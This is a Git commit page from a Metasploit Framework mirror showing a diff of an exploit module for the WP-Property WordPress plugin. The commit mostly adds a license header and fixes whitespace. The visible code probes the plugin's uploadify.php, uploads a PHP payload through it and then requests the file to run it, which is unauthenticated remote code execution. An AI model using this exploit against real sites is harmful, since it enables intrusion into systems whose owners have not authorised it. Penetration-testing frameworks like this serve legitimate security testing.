infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Final changes

unstable
sinn3r 2012-12-24 15:08:52 -06:00
parent 3d27397429
commit d69e506221
1 changed files with 16 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/unix/webapp/wp_property_upload_exec.rb
View File

@ -1,3 +1,11 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
@ -53,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
'method' => 'GET',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
})
if not res or res.code != 200
@ -80,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
@ -94,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({
'uri' => upload_uri,
'method' => 'GET'
'uri' => upload_uri,
'method' => 'GET'
})
end
end